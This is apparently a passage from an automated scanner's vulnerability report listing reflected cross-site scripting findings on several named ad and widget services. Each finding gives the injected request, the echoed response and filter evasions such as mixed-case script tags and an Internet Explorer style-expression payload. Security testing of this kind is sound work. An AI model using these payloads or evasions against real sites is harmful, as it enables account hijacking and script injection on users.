User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:12 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 4617

if (typeof truste == "undefined" || !truste) {    var truste= {};    truste.ca= {};    truste.ca.listeners = {};    truste.img = new Image(1,1);    truste.defjsload = false;        truste.ts = null; //initi
...[SNIP]...
</div>\n';    var te_clr1_att02cont3_bi = {    'baseName':'te-clr1-att02cont3',                            'anchName':'te-clr1-att02cont3-anch',                            'width':728,                            'height':90,                            'ox':20a5e47<script>alert(1)</script>27256ed0b74,                            'oy':0,                            'plc':'tr',                            'iplc':'ctr',                            'intDivName':'te-clr1-att02cont3-itl',                            'iconSpanId':'te-clr1-att02cont3-icon',                            'backgroundColor':'white',                            'opacity':
...[SNIP]...
3.45. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload a3412<ScRiPt>alert(1)</ScRiPt>a3c6dbfee4b was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tra3412<ScRiPt>alert(1)</ScRiPt>a3c6dbfee4b&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:23 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3841

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
</div>\n';
var te_clr1_att02cont3_bi={baseName:"te-clr1-att02cont3",anchName:"te-clr1-att02cont3-anch",width:728,height:90,ox:20,oy:0,plc:"tra3412<ScRiPt>alert(1)</ScRiPt>a3c6dbfee4b",iplc:"ctr",intDivName:"te-clr1-att02cont3-itl",iconSpanId:"te-clr1-att02cont3-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att02cont3",noticeBaseUrl:"/camsg?",irBaseUrl:"/c
...[SNIP]...
3.46. http://choices.truste.com/ca [zi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload c0abf<ScRiPt>alert(1)</ScRiPt>9538de4130f was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002c0abf<ScRiPt>alert(1)</ScRiPt>9538de4130f&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:18 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3841

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
uste.ca.hideoverlay(te_clr1_att02cont3_bi)",icon:"http://choices.truste.com/assets/admarker.png",icon_cam:"http://choices.truste.com/assets/adicon.png",iconText:"",aid:"att02",pid:"mec01",zindex:"10002c0abf<ScRiPt>alert(1)</ScRiPt>9538de4130f",cam:"2",cid:"0311wl728x90"};
var tecabaseurl="http://choices.truste.com/";truste.ca.addEvent(window,"load",function(){var a=te_clr1_att02cont3_bi;
if(!truste.defjsload){var c=document.createElement("
...[SNIP]...
3.47. http://content.pulse360.com/cgi-bin/context.cgi [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /cgi-bin/context.cgi

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbbee'%3balert(1)//a187687dcce was submitted in the id parameter. This input was echoed as fbbee';alert(1)//a187687dcce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/context.cgi?id=91041742fbbee'%3balert(1)//a187687dcce&ganid=floridatoday&gans=news&ganss=&format=bare&ganst=&title=1&signup=1 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:36 GMT
Server: Barista/1.1-(eankbk)
Connection: Close
Content-Length: 3465
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"

document.write('<style type="text/css">.p360_listing { cursor: pointer;}</style><!--Ad Markup by Seevast--><div id="p360_ad_unit"><div id="p360_header"><div class="p360_aligner_left"><span id="p360_
...[SNIP]...
<a target="_Blank" href="https://ads.pulse360.com/advertisers.html?refid=91041742fbbee';alert(1)//a187687dcce" style="color: inherit; text-decoration: inherit;" >
...[SNIP]...
3.48. http://ct.buzzfeed.com/wd/UserWidget [amp;or parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The value of the amp;or request parameter is copied into the HTML document as plain text between tags. The payload 1726d<script>alert(1)</script>283b85948bd was submitted in the amp;or parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=www.thevine.com.au&amp;to=1&amp;or=vb1726d<script>alert(1)</script>283b85948bd&amp;wid=1&amp;cb=1304949685154 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Mon, 09 May 2011 14:07:14 GMT
Server: lighttpd bf1
Content-Length: 597

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 143,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb1726d<script>alert(1)</script>283b85948bd&wid=1&to=1&u=www.thevine.com.au - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb1726d<script>
...[SNIP]...
3.49. http://ct.buzzfeed.com/wd/UserWidget [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload bb541<script>alert(1)</script>ed88bb99e34 was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=www.thevine.com.aubb541<script>alert(1)</script>ed88bb99e34&amp;to=1&amp;or=vb&amp;wid=1&amp;cb=1304949685154 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Mon, 09 May 2011 14:07:12 GMT
Server: lighttpd bf1
Content-Length: 597

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 143,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=www.thevine.com.aubb541<script>alert(1)</script>ed88bb99e34 - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=www.thevine.com.aubb541<script>
...[SNIP]...
3.50. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.irishtimes.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 84ed8<script>alert(1)</script>75de7d1f973 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.irishtimes.com/p.json?callback=_ate.ad.hpr84ed8<script>alert(1)</script>75de7d1f973&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html&1nv0nd4 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=1304471550.60|1304471550.1OD|1304471550.1FE; dt=X; psc=4; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 399
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 09 May 2011 14:04:33 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08 Jun 2011 14:04:33 GMT; Path=/
Set-Cookie: di=%7B%7D..1304949873.1FE|1304949873.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 08:22:03 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 09 May 2011 14:04:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 14:04:33 GMT
Connection: close

_ate.ad.hpr84ed8<script>alert(1)</script>75de7d1f973({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.irishti
...[SNIP]...
3.51. http://edge.viagogo.co.uk/feeds/widget.ashx [PCID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge.viagogo.co.uk
Path:   /feeds/widget.ashx

Issue detail

The value of the PCID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e596e"style%3d"x%3aexpression(alert(1))"a69dbd9369d was submitted in the PCID parameter. This input was echoed as e596e"style="x:expression(alert(1))"a69dbd9369d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /feeds/widget.ashx?category=rockandpoptickets&formatid=2&count=10&affiliateID=769&PCID=HAFFGBCLAREFWidg371EC42B62e596e"style%3d"x%3aexpression(alert(1))"a69dbd9369d HTTP/1.1
Host: edge.viagogo.co.uk
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=7200
Content-Type: text/html; charset=utf-8
Date: Mon, 09 May 2011 14:04:32 GMT
Expires: Mon, 09 May 2011 16:04:32 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: PCID=HAFFGBCLAREFWidg371EC42B62e596e"style="x:expression(alert(1))"a69dbd9369d; domain=viagogo.co.uk; expires=Wed, 08-Jun-2011 14:04:32 GMT; path=/; HttpOnly
Set-Cookie: vTrack=769; domain=viagogo.co.uk; expires=Wed, 08-Jun-2011 14:04:32 GMT; path=/; HttpOnly
Set-Cookie: .VGGANON=8nITaAQwzgEkAAAAN2NkY2E2ZGUtMDAyYS00OGJlLWI1N2QtYzZjNWZjOTU2NTg30; domain=viagogo.co.uk; expires=Wed, 03-Apr-2013 00:44:32 GMT; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 4250

<style type="text/css">
/* CSS STARTS HERE */
.go_simple_widget {border:1px solid #bfbfc0; margin:0px; padding:0px;}
.go_simple_widget h1 {margin:0px; padding: 4px 0px 4px 8px; border-bottom:1px
...[SNIP]...
<a href="http://www.viagogo.co.uk/Concert-Tickets/Rock-and-Pop/Take-That-Tickets?AffiliateID=769&PCID=HAFFGBCLAREFWidg371EC42B62e596e"style="x:expression(alert(1))"a69dbd9369d" title="Take That Tickets" target="_blank">
...[SNIP]...
3.52. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload d1b1e<script>alert(1)</script>b22bf009d9c was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&uid=9ByavNwWFmRBp6h6_40792835d1b1e<script>alert(1)</script>b22bf009d9c&xy=0%2C0&wh=728%2C90&vchannel=382765&cid=Toyota_2011_RAAP&iad=1304949550599-23798237647861244&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26;sz=728x90;ord=[timestamp]?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9C64981B8EF23259D938F84387571176; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Mon, 09 May 2011 13:59:26 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("9ByavNwWFmRBp6h6_40792835d1b1e<script>alert(1)</script>b22bf009d9c");
3.53. http://floridatoday.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://floridatoday.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48826'-alert(1)-'7bb1993fb0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=13767&48826'-alert(1)-'7bb1993fb0c=1 HTTP/1.1
Host: floridatoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7NwEAAAEvvajK5QA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q+LnAA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 14:00:56 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q+LnAA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 14:00:56 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:56 GMT
Age: 0
Connection: keep-alive
Content-Length: 11737

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
,aol,ask,live,bing",
'ids.aol':"10",
'fields.aol':"query,as_q,q",
'fields.ask':"q",
'fields.google':"q,as_q"};
$iTXT.js.serverUrl='http://floridatoday.us.intellitxt.com';$iTXT.js.pageQuery='ipid=13767&48826'-alert(1)-'7bb1993fb0c=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}
3.54. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aedca'-alert(1)-'239f7d9d658 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=zszMzMzM_D_5U-Olm8T4PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BAgUCAAQAAAAAcC4a9AAAAAA.&tt_code=4455744&udj=uf%28%27a%27%2C+10005%2C+1304949637%29%3Buf%28%27c%27%2C+47078%2C+1304949637%29%3Buf%28%27r%27%2C+327251%2C+1304949637%29%3Bppv%289163%2C+%274297476271584241789%27%2C+1304949637%2C+1305122437%2C+47078%2C+49165%29%3B&cnd=!QxexlQjm7wIQ0_wTGAAgjYADKNkJMQAAAMDMzPw_QhMIABAAGAAgASj-__________8BSABQAFi5P2AAaOQCaedca'-alert(1)-'239f7d9d658&referrer=http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5EH26G%5ECP_ID%5E47078%5ESEG_CODES%5EH26G-8&pp=1.30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:01:02 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:02 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:02 GMT; domain=.adnxs.com; HttpOnly
